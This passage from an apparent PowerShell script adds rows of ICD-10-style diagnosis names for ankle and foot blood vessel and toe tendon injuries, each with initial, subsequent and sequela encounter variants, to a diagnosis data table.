of plantar artery of right foot","Unspecified injury of plantar artery of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of plantar artery of left foot","Unspecified injury of plantar artery of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of plantar artery of left foot","Unspecified injury of plantar artery of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of plantar artery of left foot","Unspecified injury of plantar artery of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of plantar artery of unspecified foot","Unspecified injury of plantar artery of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of plantar artery of unspecified foot","Unspecified injury of plantar artery of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of plantar artery of unspecified foot","Unspecified injury of plantar artery of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of plantar artery of right foot","Laceration of plantar artery of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of plantar artery of right foot","Laceration of plantar artery of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of plantar artery of right foot","Laceration of plantar artery of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of plantar artery of left foot","Laceration of plantar artery of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of plantar artery of left foot","Laceration of plantar artery of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of plantar artery of left foot","Laceration of plantar artery of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of plantar artery of unspecified foot","Laceration of plantar artery of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of plantar artery of unspecified foot","Laceration of plantar artery of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of plantar artery of unspecified foot","Laceration of plantar artery of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of plantar artery of right foot","Other specified injury of plantar artery of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of plantar artery of right foot","Other specified injury of plantar artery of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of plantar artery of right foot","Other specified injury of plantar artery of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of plantar artery of left foot","Other specified injury of plantar artery of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of plantar artery of left foot","Other specified injury of plantar artery of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of plantar artery of left foot","Other specified injury of plantar artery of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of plantar artery of unspecified foot","Other specified injury of plantar artery of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of plantar artery of unspecified foot","Other specified injury of plantar artery of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of plantar artery of unspecified foot","Other specified injury of plantar artery of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal vein of right foot","Unspecified injury of dorsal vein of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal vein of right foot","Unspecified injury of dorsal vein of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal vein of right foot","Unspecified injury of dorsal vein of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal vein of left foot","Unspecified injury of dorsal vein of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal vein of left foot","Unspecified injury of dorsal vein of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal vein of left foot","Unspecified injury of dorsal vein of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal vein of unspecified foot","Unspecified injury of dorsal vein of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal vein of unspecified foot","Unspecified injury of dorsal vein of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal vein of unspecified foot","Unspecified injury of dorsal vein of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal vein of right foot","Laceration of dorsal vein of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal vein of right foot","Laceration of dorsal vein of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal vein of right foot","Laceration of dorsal vein of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal vein of left foot","Laceration of dorsal vein of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal vein of left foot","Laceration of dorsal vein of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal vein of left foot","Laceration of dorsal vein of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal vein of unspecified foot","Laceration of dorsal vein of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal vein of unspecified foot","Laceration of dorsal vein of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal vein of unspecified foot","Laceration of dorsal vein of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal vein of right foot","Other specified injury of dorsal vein of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal vein of right foot","Other specified injury of dorsal vein of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal vein of right foot","Other specified injury of dorsal vein of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal vein of left foot","Other specified injury of dorsal vein of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal vein of left foot","Other specified injury of dorsal vein of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal vein of left foot","Other specified injury of dorsal vein of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal vein of unspecified foot","Other specified injury of dorsal vein of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal vein of unspecified foot","Other specified injury of dorsal vein of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal vein of unspecified foot","Other specified injury of dorsal vein of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at ankle and foot level, right leg","Unspecified injury of other blood vessels at ankle and foot level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at ankle and foot level, right leg","Unspecified injury of other blood vessels at ankle and foot level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at ankle and foot level, right leg","Unspecified injury of other blood vessels at ankle and foot level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at ankle and foot level, left leg","Unspecified injury of other blood vessels at ankle and foot level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at ankle and foot level, left leg","Unspecified injury of other blood vessels at ankle and foot level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at ankle and foot level, left leg","Unspecified injury of other blood vessels at ankle and foot level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at ankle and foot level, unspecified leg","Unspecified injury of other blood vessels at ankle and foot level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at ankle and foot level, unspecified leg","Unspecified injury of other blood vessels at ankle and foot level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at ankle and foot level, unspecified leg","Unspecified injury of other blood vessels at ankle and foot level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at ankle and foot level, right leg","Laceration of other blood vessels at ankle and foot level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at ankle and foot level, right leg","Laceration of other blood vessels at ankle and foot level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at ankle and foot level, right leg","Laceration of other blood vessels at ankle and foot level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at ankle and foot level, left leg","Laceration of other blood vessels at ankle and foot level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at ankle and foot level, left leg","Laceration of other blood vessels at ankle and foot level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at ankle and foot level, left leg","Laceration of other blood vessels at ankle and foot level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at ankle and foot level, unspecified leg","Laceration of other blood vessels at ankle and foot level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at ankle and foot level, unspecified leg","Laceration of other blood vessels at ankle and foot level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at ankle and foot level, unspecified leg","Laceration of other blood vessels at ankle and foot level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at ankle and foot level, right leg","Other specified injury of other blood vessels at ankle and foot level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at ankle and foot level, right leg","Other specified injury of other blood vessels at ankle and foot level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at ankle and foot level, right leg","Other specified injury of other blood vessels at ankle and foot level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at ankle and foot level, left leg","Other specified injury of other blood vessels at ankle and foot level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at ankle and foot level, left leg","Other specified injury of other blood vessels at ankle and foot level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at ankle and foot level, left leg","Other specified injury of other blood vessels at ankle and foot level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at ankle and foot level, unspecified leg","Other specified injury of other blood vessels at ankle and foot level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at ankle and foot level, unspecified leg","Other specified injury of other blood vessels at ankle and foot level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at ankle and foot level, unspecified leg","Other specified injury of other blood vessels at ankle and foot level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at ankle and foot level, right leg","Unspecified injury of unspecified blood vessel at ankle and foot level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at ankle and foot level, right leg","Unspecified injury of unspecified blood vessel at ankle and foot level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at ankle and foot level, right leg","Unspecified injury of unspecified blood vessel at ankle and foot level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at ankle and foot level, left leg","Unspecified injury of unspecified blood vessel at ankle and foot level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at ankle and foot level, left leg","Unspecified injury of unspecified blood vessel at ankle and foot level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at ankle and foot level, left leg","Unspecified injury of unspecified blood vessel at ankle and foot level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at ankle and foot level, unspecified leg","Unspecified injury of unspecified blood vessel at ankle and foot level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at ankle and foot level, unspecified leg","Unspecified injury of unspecified blood vessel at ankle and foot level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at ankle and foot level, unspecified leg","Unspecified injury of unspecified blood vessel at ankle and foot level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at ankle and foot level, right leg","Laceration of unspecified blood vessel at ankle and foot level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at ankle and foot level, right leg","Laceration of unspecified blood vessel at ankle and foot level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at ankle and foot level, right leg","Laceration of unspecified blood vessel at ankle and foot level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at ankle and foot level, left leg","Laceration of unspecified blood vessel at ankle and foot level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at ankle and foot level, left leg","Laceration of unspecified blood vessel at ankle and foot level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at ankle and foot level, left leg","Laceration of unspecified blood vessel at ankle and foot level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at ankle and foot level, unspecified leg","Laceration of unspecified blood vessel at ankle and foot level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at ankle and foot level, unspecified leg","Laceration of unspecified blood vessel at ankle and foot level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at ankle and foot level, unspecified leg","Laceration of unspecified blood vessel at ankle and foot level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at ankle and foot level, right leg","Other specified injury of unspecified blood vessel at ankle and foot level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at ankle and foot level, right leg","Other specified injury of unspecified blood vessel at ankle and foot level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at ankle and foot level, right leg","Other specified injury of unspecified blood vessel at ankle and foot level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at ankle and foot level, left leg","Other specified injury of unspecified blood vessel at ankle and foot level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at ankle and foot level, left leg","Other specified injury of unspecified blood vessel at ankle and foot level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at ankle and foot level, left leg","Other specified injury of unspecified blood vessel at ankle and foot level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at ankle and foot level, unspecified leg","Other specified injury of unspecified blood vessel at ankle and foot level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at ankle and foot level, unspecified leg","Other specified injury of unspecified blood vessel at ankle and foot level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at ankle and foot level, unspecified leg","Other specified injury of unspecified blood vessel at ankle and foot level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Unspecified injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Strain of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Laceration of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot","Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot","Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot","Other injury of muscle and tendon of long flexor muscle of toe at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Unspecified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Strain of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Laceration of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot","Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot","Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot","Other specified injury of muscle and tendon of long extensor muscle of toe at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of 